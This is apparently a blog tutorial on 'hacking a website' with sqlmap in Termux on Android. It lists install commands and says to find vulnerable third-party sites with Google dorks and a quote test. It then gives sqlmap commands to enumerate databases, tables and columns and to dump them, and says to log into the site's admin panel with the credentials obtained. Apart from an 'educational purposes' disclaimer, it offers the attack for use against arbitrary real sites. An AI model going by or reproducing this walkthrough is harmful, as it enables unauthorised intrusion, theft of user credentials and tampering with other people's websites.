Hello Guys, Today We going to learn how to hack a website using SQLMAP. You can use this tool on an Android device with the help of the Termux application. Today we are going to use this tool to hack a website.
Note: This post is only for educational purposes. For any illegal activity me and my blog are not responsible for that.
? Termux
? Android device (you can also use the unrooted device)
Step by Step Guide to use Sqlmap
FIRST STEP: First of all, you have to install Termux on your android device. Then install Sqlmap in the Termux application. The Sqlamp installation process is below:-
apt update && apt upgrade
pkg install git
pkg install python python2
git clone https://github.com/sqlmapproject/sqlmap
Okay, now Sqlmap is installed. Now move to the next step.
SECOND STEP: Now, you have to find SQL vulnerable sites. Use Google Dorks to find vulnerable websites. Choose a vulnerable site and go back to termux.
See More:
Q: How to check which site is vulnerable?
A: I use this dork (PHP?id=) and open a website that contains URLs like www.abc.com/php?id=1. Now enter quote (‘) after 1 and hit enter. Now, if the website gives you an error(as shown in the image below), you can try this attack on that website.
cd sqlmap
python2 sqlmap.py -u site.com/php?id=1 –dbs
python2 sqlmap.py -u site.com/php?id=1 -D databaseName –tables
python2 sqlmap.py -u site.com/php?id=1 -D DatabaseName -T TableName –columns
python2 sqlmap.py -u site.com/php?id=1 -D DatabaseName -T TableName -C ColumnName –dump
Note: Replace site.com with your target website URL.
Okay, After that, you will get a Username/Email and Password ?. Now find the website admin login panel and log in with credentials. Now you can make changes to the website.
See More:
Find Website Admin Panel Using Termux
I hoped you liked this article and understood each step. If you still have any queries, then you can ask me in the comment section.